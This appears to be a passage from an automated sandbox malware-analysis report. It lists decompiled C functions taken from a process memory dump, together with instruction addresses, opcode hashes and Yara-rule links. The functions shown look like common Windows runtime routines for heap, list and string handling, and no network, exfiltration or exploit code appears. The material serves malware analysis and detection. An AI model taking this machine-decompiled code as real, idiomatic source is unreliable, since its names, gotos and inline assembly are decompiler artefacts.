                          0x0488f0a0
                          0x0488f09e
                          0x0488f053
                          0x0488f064
                          0x0488f064
                          0x0488f06b
                          0x048dbb1a
                          0x048dbb1a
                          0x0488f071
                          0x0488f071
                          0x0488f07d
                          0x0488f082
                          0x0488f08f
                          0x0488f08f
                          0x0488f009
                          0x0488f00d
                          0x00000000
                          0x0488f00d
                          0x0488efd0
                          0x0488ef97
                          0x0488efa5
                          0x0488efaa
                          0x00000000
                          0x0488efac
                          0x0488efac
                          0x0488efac
                          0x00000000
                          0x0488efb2
                          0x0488f036
                          0x0488f03a
                          0x0488f040
                          0x0488f090
                          0x00000000
                          0x0488f092
                          0x0488f042
                          0x00000000
                          0x0488f042
                          0x0488efb7
                          0x0488efb9
                          0x0488efbc
                          0x0488efb0
                          0x0488efb0
                          0x00000000
                          0x0488efbe
                          0x0488efbe
                          0x0488efc1
                          0x00000000
                          0x0488efc1
                          0x0488efbc
                          0x0488efaa
                          0x0488ef91

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                          • Instruction ID: 7016edf3362229a7f118f1595e312cded480eb902fcb5d9b9f50ee5c14d325a4
                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                          • Instruction Fuzzy Hash: 9051E230A04249DFDB20EF68C0907AEBBB1AF45318F188BACDB45D7282D375B989D741
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0494740D, Relevance: .1, Instructions: 141COMMON
                          Download Yara Rule
                          C-Code - Quality: 84%
                          			E0494740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E048CD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E048BF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04894620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04894620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E048BF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04894620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                          0x0494740d
                          0x0494740d
                          0x04947412
                          0x04947413
                          0x04947416
                          0x04947418
                          0x0494741c
                          0x0494741f
                          0x04947422
                          0x04947422
                          0x04947428
                          0x0494742a
                          0x0494742a
                          0x04947451
                          0x04947432
                          0x0494744f
                          0x0494744f
                          0x00000000
                          0x04947434
                          0x04947438
                          0x04947443
                          0x04947517
                          0x04947517
                          0x0494751a
                          0x04947535
                          0x04947520
                          0x04947527
                          0x0494752c
                          0x04947531
                          0x04947533
                          0x00000000
                          0x04947533
                          0x00000000
                          0x04947531
                          0x0494754b
                          0x0494754f
                          0x0494755c
                          0x0494755c
                          0x0494755f
                          0x04947560
                          0x04947561
                          0x04947562
                          0x04947563
                          0x04947568
                          0x0494756a
                          0x0494756c
                          0x0494756d
                          0x0494756d
                          0x0494756f
                          0x04947572
                          0x04947574
                          0x04947577
                          0x0494757c
                          0x0494757f
                          0x00000000
                          0x04947551
                          0x04947551
                          0x04947551
                          0x04947553
                          0x04947553
                          0x04947449
                          0x04947449
                          0x0494744c
                          0x0494744c
                          0x00000000
                          0x0494744c
                          0x04947443
                          0x0494750e
                          0x04947514
                          0x04947514
                          0x04947455
                          0x04947469
                          0x0494746d
                          0x00000000
                          0x04947473
                          0x04947473
                          0x04947476
                          0x04947480
                          0x04947484
                          0x0494748e
                          0x04947493
                          0x04947493
                          0x04947496
                          0x04947499
                          0x049474a1
                          0x049474b1
                          0x049474b5
                          0x00000000
                          0x049474bb
                          0x049474c1
                          0x049474c1
                          0x049474c4
                          0x049474c5
                          0x049474c6
                          0x049474c7
                          0x049474c8
                          0x049474cd
                          0x00000000
                          0x049474d3
                          0x049474d3
                          0x049474d6
                          0x049474d8
                          0x049474db
                          0x049474dd
                          0x049474e0
                          0x049474e7
                          0x049474ee
                          0x049474ee
                          0x049474f4
                          0x049474f9
                          0x00000000
                          0x049474fb
                          0x049474fb
                          0x049474fd
                          0x04947500
                          0x04947503
                          0x04947505
                          0x04947505
                          0x049474f9
                          0x00000000
                          0x049474cd
                          0x049474b5
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                          • Instruction ID: 199f6dacebfe3b79f4074d836f8ccb03f55fb51d7d5ad10150f5d753aa5aad13
                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                          • Instruction Fuzzy Hash: C2515C7160060AEFDB15CF58C480E96BBB9FF85308F1585BAE908DF251E771E946CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048A4D3B, Relevance: .1, Instructions: 131COMMON
                          Download Yara Rule
                          C-Code - Quality: 78%
                          			E048A4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x496d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E048BFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4967bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E048BB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04894620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0487CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E048BB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E048BF380(_t67 + 0xc, 0x4855138, 0x10) == 0) {
								 *0x49660d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E048A4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E048A4E70(0x49686b0, 0x48a5690, 0, 0) != 0) {
					_t46 = E0487CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                          0x048a4d3b
                          0x048a4d4d
                          0x048a4d53
                          0x048a4d58
                          0x048a4d65
                          0x048a4d6c
                          0x048a4d71
                          0x048a4d77
                          0x048a4d7f
                          0x048a4d8c
                          0x048a4d8e
                          0x048a4dad
                          0x048a4db0
                          0x048a4db7
                          0x048a4db8
                          0x048a4db9
                          0x048a4dba
                          0x048a4dbb
                          0x048a4dc1
                          0x048a4dc8
                          0x048a4dcc
                          0x048a4dd5
                          0x048a4dde
                          0x048a4ddf
                          0x048a4de0
                          0x048a4de1
                          0x048a4de6
                          0x048a4de7
                          0x048a4de9
                          0x048a4df3
                          0x00000000
                          0x00000000
                          0x048e6c7c
                          0x048e6c8a
                          0x048e6c8a
                          0x048e6c9d
                          0x048e6ca7
                          0x048e6cac
                          0x048e6cb2
                          0x048e6cb9
                          0x00000000
                          0x048e6cbf
                          0x048e6cbf
                          0x00000000
                          0x048e6cbf
                          0x048e6cb9
                          0x048a4dfb
                          0x048e6ccf
                          0x048e6cd3
                          0x048a4e32
                          0x048a4e39
                          0x048e6ce0
                          0x048e6cf2
                          0x048e6cf2
                          0x048e6ce0
                          0x048a4e3f
                          0x048a4e41
                          0x048a4e51
                          0x048a4e51
                          0x048a4e03
                          0x048a4e03
                          0x048a4e09
                          0x048a4e0f
                          0x048a4e57
                          0x00000000
                          0x00000000
                          0x048a4e1b
                          0x048a4e30
                          0x048a4e5b
                          0x048a4e5b
                          0x00000000
                          0x048a4e30
                          0x048a4e11
                          0x048a4e11
                          0x048a4e16
                          0x00000000
                          0x048a4e16
                          0x048a4e01
                          0x00000000
                          0x048a4e01
                          0x048a4da5
                          0x048e6c6b
                          0x00000000
                          0x048a4dab
                          0x048a4dab
                          0x00000000
                          0x048a4dab

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 98b77fd7f327d14fdf55c9485eb5a51ab569e896e0c80235b0368a57a002324d
                          • Instruction ID: 5d2fd9265c57323d397ee64c5e0033f7b4ae0a0e4c609b10a62846ee49eefb6e
                          • Opcode Fuzzy Hash: 98b77fd7f327d14fdf55c9485eb5a51ab569e896e0c80235b0368a57a002324d
                          • Instruction Fuzzy Hash: B041C371A40718AFFF21DF18CD80B6677A9EB45A14F040AA9E945D7280D7F4FD60CA92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04888A0A, Relevance: .1, Instructions: 120COMMON
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E04888A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x496d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E048BB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0488E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4851180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E048A1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E048B3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04888999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                          0x04888a0a
                          0x04888a1c
                          0x04888a23
                          0x04888a2e
                          0x04888a30
                          0x04888a36
                          0x04888a3c
                          0x04888a3e
                          0x04888a4a
                          0x04888a52
                          0x04888a9c
                          0x04888aae
                          0x04888a58
                          0x04888a5e
                          0x04888a6a
                          0x04888a6f
                          0x04888a75
                          0x04888a7d
                          0x04888a85
                          0x04888a86
                          0x04888a89
                          0x04888a93
                          0x04888a99
                          0x04888a9b
                          0x00000000
                          0x04888aaf
                          0x04888abe
                          0x04888ac3
                          0x04888acb
                          0x04888ad7
                          0x04888ae0
                          0x04888af1
                          0x00000000
                          0x04888af1
                          0x04888acd
                          0x04888ad5
                          0x04888afb
                          0x04888afd
                          0x04888aff
                          0x04888b07
                          0x04888b22
                          0x04888b24
                          0x04888b2a
                          0x04888b2e
                          0x04888b3f
                          0x04888b78
                          0x04888b41
                          0x04888b52
                          0x04888b54
                          0x04888b5c
                          0x04888b74
                          0x04888b74
                          0x04888b5c
                          0x04888b3f
                          0x04888b5e
                          0x04888b61
                          0x04888b64
                          0x04888b64
                          0x04888b6c
                          0x04888b6c
                          0x04888b11
                          0x048d9cd5
                          0x048d9cd5
                          0x04888b17
                          0x04888b1a
                          0x04888b1a
                          0x00000000
                          0x04888ad5
                          0x04888a89

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d99a2ff605dccbfa4d41c007082a260322f79b114d674236a016f0b8a1e52766
                          • Instruction ID: fee09a20c9fc8abce17ce15d854abd17b45f0aaf555d2afcb257f48d99190675
                          • Opcode Fuzzy Hash: d99a2ff605dccbfa4d41c007082a260322f79b114d674236a016f0b8a1e52766
                          • Instruction Fuzzy Hash: 6C4141B5A4022C9BDB24EF59CC88AA9B7F4EF84304F504AE9D819D7251E770AE84CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B3D43, Relevance: .1, Instructions: 106COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E048B3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04887B60(0, _t61, 0x48511c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04887B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04894620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                          0x048b3d4c
                          0x048b3d50
                          0x048b3d55
                          0x048b3d5e
                          0x048ee79a
                          0x00000000
                          0x048ee79a
                          0x048b3d68
                          0x048ee789
                          0x048b3d9d
                          0x048b3da3
                          0x048b3daf
                          0x048b3db5
                          0x048b3dbc
                          0x048b3dc4
                          0x048b3dc9
                          0x048b3dce
                          0x048ee7ae
                          0x048ee7ae
                          0x048b3dde
                          0x048b3de2
                          0x048b3de7
                          0x048b3e0d
                          0x048b3e13
                          0x048b3e16
                          0x048b3e1e
                          0x048b3e25
                          0x048b3e28
                          0x00000000
                          0x00000000
                          0x048b3e2a
                          0x048b3e2f
                          0x048b3e37
                          0x048b3e37
                          0x00000000
                          0x048b3e37
                          0x048b3e31
                          0x00000000
                          0x048b3e31
                          0x048b3e20
                          0x048b3e20
                          0x048b3e35
                          0x00000000
                          0x048b3de9
                          0x048b3de9
                          0x048b3de9
                          0x048b3dee
                          0x048b3dfd
                          0x048b3dff
                          0x048b3e02
                          0x048b3e05
                          0x048b3e05
                          0x00000000
                          0x048b3df0
                          0x048b3de7
                          0x048ee78f
                          0x048ee794
                          0x048b3d79
                          0x048b3d84
                          0x048b3d89
                          0x048b3d8e
                          0x00000000
                          0x048ee7a4
                          0x048b3d96
                          0x048b3d9a
                          0x00000000
                          0x048b3d9a
                          0x00000000
                          0x048ee794
                          0x048b3d6e
                          0x048b3d73
                          0x00000000
                          0x048ee7b5
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 80a555b0f91a66156f72727b17f166ecd4c071213c15a56ce1c541bedce37044
                          • Instruction ID: 3e1728f25411033d39a9e83e106a7334ffbd44dc0608eb92bab3904fa2cfbc1b
                          • Opcode Fuzzy Hash: 80a555b0f91a66156f72727b17f166ecd4c071213c15a56ce1c541bedce37044
                          • Instruction Fuzzy Hash: C131AD31A04614DFD7258F2AC841ABABBF5EF95704B098A6EE889CB750E730E840D7D1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048AA61C, Relevance: .1, Instructions: 106COMMON
                          Download Yara Rule
                          C-Code - Quality: 78%
                          			E048AA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4950220);
				E048CD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x4967b9c; // 0x0
				_t55 = L04894620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E048CD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x4967b10 =  *0x4967b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x496536c; // 0x69cbc8
					if( *_t51 != 0x4965368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x4965368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x496536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E048AA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                          0x048aa61c
                          0x048aa61e
                          0x048aa623
                          0x048aa628
                          0x048aa62b
                          0x048aa62d
                          0x048aa648
                          0x048aa64a
                          0x048aa64f
                          0x048e9b44
                          0x048aa6ec
                          0x048aa6f1
                          0x048aa6f1
                          0x048aa655
                          0x048aa657
                          0x048aa65a
                          0x048aa65d
                          0x048aa662
                          0x048aa663
                          0x048aa667
                          0x048aa668
                          0x048aa66d
                          0x048aa706
                          0x048aa706
                          0x048e9bda
                          0x048e9be6
                          0x048e9beb
                          0x00000000
                          0x048e9beb
                          0x048aa679
                          0x048e9b7a
                          0x00000000
                          0x048e9b7a
                          0x048aa683
                          0x048aa6f4
                          0x048aa6f7
                          0x048aa6f9
                          0x048aa6fd
                          0x048aa6a0
                          0x048aa6a0
                          0x048aa6ad
                          0x048aa6af
                          0x048aa6b4
                          0x048e9ba7
                          0x048e9bac
                          0x00000000
                          0x00000000
                          0x048e9bc6
                          0x048e9bce
                          0x048e9bd1
                          0x048e9bd3
                          0x048e9bd3
                          0x00000000
                          0x048e9bd1
                          0x048aa6bd
                          0x048aa6c3
                          0x048aa6c6
                          0x048aa6d2
                          0x048aa701
                          0x048aa704
                          0x00000000
                          0x048aa704
                          0x048aa6d4
                          0x048aa6d6
                          0x048aa6d9
                          0x048aa6db
                          0x048aa6e1
                          0x048aa6e6
                          0x048aa6e8
                          0x048aa6e8
                          0x048aa6ea
                          0x00000000
                          0x048aa6ea
                          0x048aa688
                          0x048aa692
                          0x048aa694
                          0x048aa699
                          0x00000000
                          0x00000000
                          0x048aa69d
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 16d0bbcffde1dd4dc96d5dec66425de12956c574311979462de9fe30014f3f51
                          • Instruction ID: d2072cca126b9b8000db5e2ebd0d3a4245f168b27d46029695b001f9c855b34b
                          • Opcode Fuzzy Hash: 16d0bbcffde1dd4dc96d5dec66425de12956c574311979462de9fe30014f3f51
